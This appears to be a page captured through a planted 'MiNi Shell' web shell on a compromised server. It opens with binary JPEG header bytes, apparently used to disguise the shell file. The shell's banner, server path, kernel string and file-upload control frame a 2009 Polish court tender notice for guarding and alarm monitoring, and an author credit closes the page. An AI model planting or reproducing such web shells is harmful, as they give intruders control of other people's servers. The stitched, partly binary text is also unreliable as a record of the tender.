JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090420/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090420/111492-N-2009.html

<p class="kh_header"><b>Siemianowice Śląskie: Stała i bezpośrednia ochrona fizyczna osób i mienia wraz z monitorowaniem sygnałów alarmowych i interwencją grupy</b><br>
<b>Numer ogłoszenia: 111492 - 2009; data zamieszczenia: 20.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Rejonowy w Siemianowicach Śląskich , ul. Chorzowska 14, 41-106 Siemianowice Śląskie, woj. śląskie, tel. 032 7654306, faks 032 7654306.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.siemianowice.sr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Stała i bezpośrednia ochrona fizyczna osób i mienia wraz z monitorowaniem sygnałów alarmowych i interwencją grupy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usługi zgodnie z zapisami SIWZ Sądu Rejonowego w Siemianowicach Śląskich polegającej na:
1) Ochronie osób i mienia budynku Sądu Rejonowego w Siemianowicach                                                                                      Śląskich przy ul. Chorzowskiej 14 - ochrona świadczona całodobowo, 7 dni                    w tygodniu, przez jednego pracownika,
2) Monitoringu sygnałów alarmowych zainstalowanych w w/w budynku,  konserwacja systemu alarmowego - ochrona techniczna świadczona całodobowo,
3) Ochronie osób i mienia Ośrodka Kuratorskiego i Zespołu Kuratorskiej Służby Sądowej w wynajmowanych pomieszczeniach w Siemianowicach Śląskich przy ulicy Zgrzebnioka 43A - ochrona świadczona w dni robocze           (od poniedziałku do piątku) w godzinach od 715 do 1915, tj. 12 godzin / dobę,
4) Monitoringu sygnałów alarmowych zainstalowanych w w/w Ośrodku Kuratorskim i Zespole Kuratorskiej Służby Sądowej, konserwacja systemu alarmowego - ochrona techniczna świadczona całodobowo,
5) Interwencji samochodowej grupy interwencyjnej w przypadku stwierdzenia alarmu lub odebrania wezwania w sytuacji zagrożenia lub potrzeby wsparcia oraz w przypadku stwierdzenia zagrożenia mienia zabezpieczenie obiektów do momentu odwołania przez Zamawiającego - dotarcie do wskazanego obiektu winno odbywać się w czasie nie dłuższym niż 15 minut od momentu otrzymania informacji..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 79.71.10.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy:
A.	spełniają wymagania określone w art. 22 ust. 1 ustawy Prawo zamówień 	publicznych z dnia 29 stycznia 2004 roku (Dz.U. Nr 223 poz. 1655 z późn. 	zm.), tj. :
1)	posiadają wszelkie uprawnienia do wykonania określonej działalności lub 			czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2)	posiadają niezbędną wiedzę i doświadczenie, oraz dysponują potencjałem 		technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią 		pisemne zobowiązanie innych podmiotów do udostępnienia potencjału 			technicznego i osób zdolnych do wykonania zamówienia,
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej 				wykonanie zamówienia,
4)	nie podlegają wykluczeniu z postępowania o udzielanie zamówienia.
B.	wykażą się posiadaniem odpowiednich uprawnień, tj.: posiadają aktualną 	koncesję w okresie lipiec 2009 - lipiec 2011, wydaną przez Ministra Spraw 	Wewnętrznych i Administracji, o której mowa w art. 15 ust.1 ustawy z dnia 22 	sierpnia 1997r. o ochronie osób i mienia (tekst jednolity - Dz.U.2005 , Nr 145, 	poz. 1221 z późn. zm.);
C.	wykażą się odpowiednim doświadczeniem, tj.: w okresie ostatnich 3 lat, a jeśli 	okres prowadzenia działalności jest krótszy - w tym okresie, zrealizowali                	co najmniej 3 usługi polegające na fizycznej ochronie osób i mienia 	świadczone w budynkach użyteczności publicznej (poprzez budynki 	użyteczności 	publicznej należy rozumieć obiekty według definicji zawartej 	w rozporządzeniu Ministra Infrastruktury z dnia 12.04.2002 r. w sprawie 	warunków technicznych, jakim powinny odpowiadać budynki i ich 	usytuowanie - Dz. U. Nr 75, poz. 690 z późn. zm.), z podaniem ich wartości 	(co najmniej 50 000 zł brutto za każdą usługę), dat wykonania i odbiorców 	oraz załączenia dokumentów potwierdzających, że usługi te zostały wykonane 	(lub że są wykonywane) należycie;
D.	dysponują potencjałem technicznym tj.: dysponują samochodową grupą 	interwencyjną, której zadaniem będzie, w przypadku zgłoszenia zagrożenia lub 	potrzeby wsparcia, dotarcie do wskazanego obiektu w czasie nie dłuższym niż 	15 minut od momentu otrzymania informacji, wyposażoną w stosowny sprzęt 	łączności bezprzewodowej;
E.	są ubezpieczeni od odpowiedzialności cywilnej z tytułu prowadzonej 	działalności gospodarczej, tj.: posiadają polisę, a w przypadku jej braku inny 	dokument potwierdzający, że Wykonawca jest ubezpieczony od 	odpowiedzialności cywilnej w zakresie prowadzonej działalności, w zakresie 	objętym przedmiotem niniejszego zamówienia na kwotę nie mniejszą niż 	100 000 PLN.

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymaga się, aby przynajmniej jeden z Wykonawców (lub wspólnie) spełniał wymagania, o których mowa w ust. 1 lit. A pkt 1 - 3 niniejszego rozdziału SIWZ.  W przypadku konsorcjum żaden                    z wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy.

W celu potwierdzenia spełnienia opisanych wyżej warunków Wykonawca musi załączyć            do oferty dokumenty określone w rozdziale XI.

2.	Powyższe warunki są warunkami koniecznymi, jakie Oferent musi spełnić,                         w przypadku nie spełnienia powyższych warunków oferta zostanie odrzucona.
3.	Oferent zapewnia o spełnieniu powyższych warunków składając stosowne oświadczenie stanowiące załącznik nr 1 do niniejszej Specyfikacji.
4.	Ocena warunków nastąpi na zasadzie spełnia nie spełnia - na podstawie złożonych dokumentów i oświadczeń.
5.	Z treści załączonych dokumentów musi wynikać jednoznacznie, iż warunki udziału w postępowaniu Wykonawca spełnił.
6.	Z ubiegania się o zamówienie publiczne wyklucza się Wykonawców, którzy spełniają przesłanki z art. 24 ustawy Prawo zamówień publicznych, tj.

1)	wykonawców, którzy wyrządzili szkodę, nie wykonując zamówienia lub wykonując je nienależycie, jeżeli szkoda ta została stwierdzona prawomocnym orzeczeniem sądu wydanym w okresie 3 lat przed wszczęciem postępowania;
2)	wykonawców, w stosunku do których otwarto likwidację lub których upadłość ogłoszono, z wyjątkiem wykonawców, którzy po ogłoszeniu upadłości zawarli układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli poprzez likwidację majątku upadłego;
3)	wykonawców, którzy zalegają z uiszczeniem podatków opłat lub składek na  ubezpieczenia społeczne lub zdrowotne, z wyjątkiem przypadków gdy uzyskali oni przewidziane prawem zwolnienia, odroczenie, rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
4)	osoby fizyczne, które prawomocnie skazano za przestępstwo popełnione          w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
5)	spółki jawne, których wspólników prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących prace zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu  lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych,      a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
6)	spółki partnerskie, których partnera lub członka zarządu prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących prace zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału                          w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
7)	spółki komandytowe oraz spółki komandytowo-akcyjne, których  komplementariusza prawomocnie skazano za przestępstwo popełnione             w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących prace zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu  lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
8)	osoby prawne, których urzędującego członka organu zarządzającego prawomocnie skazano za przestępstwo popełnione w związku                                   z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących prace zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu  lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
9)	podmioty zbiorowe, wobec których sąd orzekł zakaz ubiegania się                     o zamówienia, na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary;
10)	wykonawców, którzy nie spełniają warunków udziału w postępowaniu,                o których mowa w art. 22 ust. 1 pkt 1-3 ustawy;
11)	wykonawców, którzy wykonywali bezpośrednio czynności związane                z przygotowaniem prowadzonego postępowania lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności, chyba że udział tych wykonawców w postępowaniu nie utrudni uczciwej konkurencji;
12)	wykonawców, którzy złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania;
13)	wykonawców, którzy nie złożyli oświadczenia o spełnieniu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnienie tych warunków lub złożone dokumenty zawierają błędy, z zastrzeżeniem art. 26 ust.3;
14)	wykonawców, którzy nie zgodzili się na przedłużenie okresu związania ofertą.

7.	Z ubiegania się o zamówienie publiczne odrzuca się ofertę która spełniają przesłanki z art. 89 ustawy Prawo zamówień publicznych, tj.:

1)	jest niezgodna z ustawą;
2)	jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia,        z zastrzeżeniem art. 87 ust 2 pkt 3;
3)	jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów         o zwalczaniu nieuczciwej konkurencji;
4)	zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia;
5)	została złożona przez wykonawcę wykluczonego z udziału w postępowaniu         o udzielenie zamówienia lub niezaproszonego do składania ofert;
6)	zawiera błędy w obliczeniu ceny;
7)	wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3;
8)	jest nieważna na podstawie odrębnych przepisów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	wypełnione, podpisane i opieczętowane ( pieczątką firmową i imienną ) przez osobę - y uprawnioną - e do reprezentowania Oferenta oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych stanowiące załącznik nr 1 do niniejszej specyfikacji,
2.	wypełniony, podpisany i opieczętowany ( pieczątką firmową  i imienną ) przez osobę - y uprawnioną - e do reprezentowania Oferenta formularz oferty  stanowiący załącznik nr 2 do niniejszej specyfikacji,
3.	koncesję, zezwolenie lub licencję, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym zamówieniem publicznym, tj.:
- aktualną koncesję wydaną przez Ministra Spraw Wewnętrznych i Administracji,               	o której mowa w art. 15 ust. 1 ustawy z dnia 22 sierpnia 1997r. o ochronie osób               	i mienia ( tekst jednolity - DZ.U.2005 Nr 145, poz. 1221) wraz ze wszystkimi 	decyzjami zmieniającymi, wydanymi do pierwotnego dokumentu. Okres koncesji nie 	może być krótszy niż termin realizacji przedmiotowego zamówienia. Z koncesji 	powinno wynikać, iż Wykonawca ma możliwość prowadzenia działalności 	gospodarczej w zakresie usług ochrony osób i mienia realizowanych w formie 	bezpośredniej ochrony fizycznej, stałej, polegającej na stałym dozorze sygnałów 	przesyłanych, gromadzonych i przetwarzanych w elektronicznych urządzeniach                 	i systemach alarmowych (w przypadku gdy Wykonawcy występują wspólnie, 	stosowne dokumenty dostarczy każdy z Wykonawców, dokumenty potwierdza za 	zgodność z oryginałem Pełnomocnik zgodnie z art. 23 ustawy),
4.	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku gdy Wykonawcy występują wspólnie, stosowne dokumenty dostarczy każdy                            z Wykonawców, dokumenty potwierdza za zgodność z oryginałem Pełnomocnik zgodnie z art. 23 ustawy. W przypadku spółki cywilnej Zamawiający żąda złożenia odpisów z właściwego rejestru albo aktualnych zaświadczeń o wpisie do ewidencji działalności gospodarczej, na każdego ze wspólników osobno),
5.	aktualną informację z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby              w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku gdy Wykonawcy występują wspólnie, stosowne dokumenty dostarczy każdy z Wykonawców, dokumenty potwierdza za zgodność z oryginałem Pełnomocnik zgodnie z art. 23 ustawy),
6.	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku gdy Wykonawcy występują wspólnie, stosowne dokumenty dostarczy każdy z Wykonawców, dokumenty potwierdza za zgodność            z oryginałem Pełnomocnik zgodnie z art. 23 ustawy),
7.	polisę ubezpieczeniową, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, w tym w zakresie objętym przedmiotem niniejszego zamówienia (w przypadku gdy Wykonawcy występują wspólnie, stosowne dokumenty dostarczy każdy z Wykonawców, dokumenty potwierdza za zgodność            z oryginałem Pełnomocnik zgodnie z art. 23 ustawy), na łączną kwotę ubezpieczenia nie mniejszą niż 100 000 PLN,
8.	wykaz wykonanych lub wykonywanych usług w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, polegających na fizycznej ochronie osób             i mienia świadczonych w budynkach użyteczności publicznej (poprzez budynki użyteczności publicznej należy rozumieć obiekty według definicji zawartej                    w rozporządzeniu Ministra Infrastruktury z dnia 12.04.2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie - Dz. U. Nr 75, poz. 690 z późn.zm.), z podaniem ich wartości, przedmiotu, dat wykonania                       i odbiorców oraz załączenia dokumentów potwierdzających, że usługi te zostały wykonane (lub że są wykonywane) należycie.
	Wykaz winien zawierać, co najmniej 3 pozycje wg załącznika nr 3 do niniejszej SIWZ,
9.	wykaz osób, które będą uczestniczyć w realizacji zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia, sporządzony na formularzu stanowiącym załącznik nr 4 do niniejszej SIWZ,
10.	oświadczenie, że Wykonawca dysponuje samochodową grupą interwencyjną, której 	zadaniem będzie, w przypadku zgłoszenia zagrożenia lub potrzeby wsparcia, 	dotarcie do wskazanego obiektu w czasie nie dłuższym niż 15 minut od momentu 	otrzymania informacji, wyposażoną w stosowny sprzęt łączności bezprzewodowej, 	sporządzone na formularzu stanowiącym załącznik nr 5 do niniejszej SIWZ,
11.	parafowany przez Wykonawcę wzór umowy wraz z załącznikiem na formularzu stanowiącym załącznik nr 6 do niniejszej specyfikacji,
12.	Pełnomocnictwo Wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ust. 2 ustawy Pzp. Pełnomocnictwo musi wskazywać Pełnomocnika, wskazywać wszystkich Wykonawców wspólnie ubiegających się             o udzielenie zamówienia oraz każdy z tych Wykonawców musi potwierdzić podpisem ustanowienie pełnomocnictwa. Ponadto Pełnomocnictwo powinno wskazywać czy dotyczy reprezentowania wszystkich Wykonawców                               w postępowaniu i zawarcia umowy o zamówienie publiczne w ich imieniu, bądź tylko reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia.
	Zgodnie z art. 141 Ustawy Wykonawcy ubiegający się wspólnie o udzielenie   zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy.
	  W przypadku spółek cywilnych należy dołączyć umowę spółki cywilnej, w której    	będą  dane o sposobie reprezentacji spółki na zewnątrz.
13.	jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania za granicą, zamiast 	dokumentów, o których mowa w pkt. 4, 5, 6, składa odpowiedni dokument lub 	dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub 	miejsce zamieszkania, potwierdzając, że nie otwarto jego likwidacji ani nie 	ogłoszono upadłości - wystawionego nie wcześniej niż 6 miesięcy przed upływem 	terminu składnia ofert. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym 	Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się ww 	dokumentów, zastępuje się je dokumentem zawierającym oświadczenie złożone 	przed notariuszem, właściwym organem sądowym, administracyjnym albo 	organem samorządu zawodowego lub gospodarczego odpowiedniego kraju,                     	w 	którym Wykonawca ma siedzibę lub miejsce zamieszkania,
14. dokumenty wymienione w pkt. 4, 5, 6, są składane w formie kserokopii 	poświadczonej za zgodność z oryginałem przez osobę - y uprawnioną - e do 	reprezentowania Wykonawcy. Poświadczenie przez Wykonawcę powinno być 	opatrzone pieczątką i podpisem osoby upoważnionej, datą i napisem za zgodność 	z oryginałem,
15. jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania za granicą, dokumenty  	wymienione w pkt. 4, 5, 6 składane są w formie oryginału, odpisu wyciągu lub 	kopii, przetłumaczonej na język polski, poświadczone przez polskie placówki 	konsularne, stosownie do obowiązujących przepisów,
16. Zamawiający może żądać przedstawienia oryginału lub notarialnie potwierdzonej 	kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kserokopia 	dokumentu jest nieczytelna lub budzi uzasadnione zastrzeżenia i wątpliwości co do 	jej prawdziwości, a Zamawiający nie może sprawdzić jej prawdziwości w inny 	sposób,
17. w toku analizy i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień 	dotyczących treści złożonych ofert. Niedopuszczalne jest prowadzenie między 	Zamawiającym a Wykonawcą negocjacji dotyczących złożonych ofert oraz                    	z zastrzeżeniem ust. 1a, 2 art. 87 ustawy Prawo zamówień publicznych 	dokonywanie jakiejkolwiek zmiany w jej treści,
18. Zamawiający poprawia w tekście oferty oczywiste omyłki pisarskie, oczywiste 	omyłki rachunkowe z uwzględnieniem konsekwencji rachunkowych dokonanych 	poprawek oraz inne omyłki polegające na niezgodności oferty ze specyfikacją 	istotnych warunków zamówienia, nie powodujące istotnych zmian w treści oferty, 	niezwłocznie zawiadamiając o tym Wykonawcę, którego oferta została 	poprawiona,
19. Zamawiający wzywa Wykonawców, którzy w określonym terminie nie złożyli 	wymaganych przez Zamawiającego oświadczeń i dokumentów, lub którzy nie 	złożyli pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego 	oświadczenia i dokumenty, zawierające błędy lub którzy złożyli wadliwe 	pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich 	złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby 	unieważnienie postępowania. Złożone na wezwania Zamawiającego oświadczenia  	i dokumenty winny potwierdzać spełnianie przez Wykonawcę warunków udziału        	w postępowaniu oraz spełnianie przez oferowane dostawy, usługi lub roboty 	budowlane wymagań określonych przez Zamawiającego, nie później niż w dniu,           	w którym upłynął termin składania wniosków o dopuszczenie do udziału                        	w postępowaniu albo termin składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.siemianowice.sr.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sąd Rejonowy w Siemianowicach Śląskich 
41-106 Siemianowice Śląskie 
ul. Chorzowska 14 
tel./fax.  : 032  76 54 318
pok. 03.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.05.2009 godzina 09:00, miejsce: Sąd Rejonowy w Siemianowicach Śląskich 
41-106 Siemianowice Śląskie 
ul. Chorzowska 14 
tel./fax.  : 032  76 54 318
pok. 03.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com